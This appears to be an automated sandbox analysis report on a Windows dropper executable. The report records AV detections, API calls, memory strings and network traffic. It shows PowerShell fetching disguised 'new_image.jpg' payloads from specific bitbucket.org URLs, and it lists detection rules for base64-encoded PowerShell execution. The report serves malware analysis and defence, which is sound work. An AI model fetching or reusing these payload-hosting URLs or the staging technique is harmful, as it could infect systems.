        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-02T19:04:55.491964+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 185.166.143.49 | 443 | TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 0XVZC3kfwL.exe; Avira: detected
        Source: 0XVZC3kfwL.exe; ReversingLabs: Detection: 42%
        Source: Submitted Sample; Integrated Neural Analysis Model: Matched 87.6% probability
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe; Code function: 0_2_00007FF681C23214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA; 0_2_00007FF681C23214
        Source: unknown; HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.8:49704 version: TLS 1.2
        Source: 0XVZC3kfwL.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: e.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wextract.pdb source: 0XVZC3kfwL.exe
        Source: Binary string: wextract.pdbGCTL source: 0XVZC3kfwL.exe
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.1545872221.000001EEDDF60000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbP@{ source: powershell.exe, 00000005.00000002.1545597457.000001EEDDF1A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbbert\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSI:Syf source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe; Code function: 0_2_00007FF681C22034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA; 0_2_00007FF681C22034
        Source: global traffic; HTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
        Source: global traffic; HTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1 | Host: bitbucket.org
        Source: Joe Sandbox View; IP Address: 185.166.143.49 185.166.143.49
        Source: Joe Sandbox View; ASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49705 -> 185.166.143.49:443
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic; HTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
        Source: global traffic; HTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1 | Host: bitbucket.org
        Source: global traffic; DNS traffic detected: DNS query: bitbucket.org
        Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 02 Oct 2024 17:04:54 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 15020 | Server: AtlassianEdge | Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding | X-Used-Mesh: False | Content-Language: en | X-View-Name: bitbucket.apps.downloads.views.download_file | Etag: "87058da896b55747ba4e6e46ed4a200d" | X-Dc-Location: Micros-3 | X-Served-By: 52563790643d | X-Version: 3ff600212c86 | X-Static-Version: 3ff600212c86 | X-Request-Count: 3879 | X-Render-Time: 0.10709047317504883 | X-B3-Traceid: f9323d398cc148a7b6a0238c8cc639ad | X-B3-Spanid: 1a15bdc36336d4d5 | X-Frame-Options: SAMEORIGIN | Content-Security-Policy: object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-5klEsQ+/lmMPaGnHlTQm6A=='; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; fr
        Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 02 Oct 2024 17:04:55 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 15023 | Server: AtlassianEdge | Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding | X-Used-Mesh: False | Content-Language: en | X-View-Name: bitbucket.apps.downloads.views.download_file | Etag: "d262e8bacb3f21ca001bdceb1cfc66a0" | X-Dc-Location: Micros-3 | X-Served-By: c1d37df8df76 | X-Version: 3ff600212c86 | X-Static-Version: 3ff600212c86 | X-Request-Count: 461 | X-Render-Time: 0.09731030464172363 | X-B3-Traceid: 8ba6f34777ac4d28bfc0b737ee6a4d2f | X-B3-Spanid: 9c57bf6c5c877b71 | X-Frame-Options: SAMEORIGIN | Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-y+F3Ri7t30+2yS3vrtRQPg=='; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://bitbucket.org
        Source: powershell.exe, 00000004.00000002.1553033093.0000023208545000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A2EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://admin.atlassian.com
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A2A2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A2BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.bitbucket.org
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ad
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ap
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ve
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpack
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bi
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/dj
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC72E0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-builds
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date&
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bitbucket.org/gateway/api/emoji/
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A7F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1568391237.0000023222708000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521063339.000001EEC3EE5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520809316.000001EEC3E14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521127326.000001EEC3F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1545100978.000001EEDDE70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520786541.000001EEC3DC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521127326.000001EEC3F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520748169.000001EEC3DA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723
        Source: powershell.exe, 00000004.00000002.1558255319.000002320A7F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1568391237.0000023222708000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521063339.000001EEC3EE5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520809316.000001EEC3E14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521127326.000001EEC3F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1545100978.000001EEDDE70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520786541.000001EEC3DC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521127326.000001EEC3F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1520748169.000001EEC3DA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bitbucket.status.atlassian.com/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bqlf8qjztdtr.statuspage.io
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC5E43000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC6843000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
        Source: powershell.exe, 00000005.00000002.1545100978.000001EEDDEC8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://go.microsoft.co
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://id.atlassian.com/login
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ft
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://id.atlassian.com/logout
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://id.atlassian.com/manage-profile/
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
        Source: powershell.exe, 00000005.00000002.1541729825.000001EED5DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541729825.000001EED5C83000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC73BF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC7306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7380000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://preferences.atlassian.com
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC72E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: powershell.exe, 00000005.00000002.1521634262.000001EEC730A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1521634262.000001EEC7302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.8:49704 version: TLS 1.2

        System Summary

Source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C22D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle | 0_2_00007FF681C22D70
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C21BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx | 0_2_00007FF681C21BF4
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C21D10 | 0_2_00007FF681C21D10
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C26F14 | 0_2_00007FF681C26F14
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C268F0 | 0_2_00007FF681C268F0
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C22EDC | 0_2_00007FF681C22EDC
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C25F80 | 0_2_00007FF681C25F80
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C241B4 | 0_2_00007FF681C241B4
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C21BF4 | 0_2_00007FF681C21BF4
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C25F7E | 0_2_00007FF681C25F7E
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C2366E | 0_2_00007FF681C2366E
Source: 0XVZC3kfwL.exe | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 3558 bytes, 1 file, at 0x2c +A "gam.bat", ID 666, number 1, 1 datablock, 0x1503 compression
Source: 0XVZC3kfwL.exe | Binary or memory string: OriginalFilename vs 0XVZC3kfwL.exe
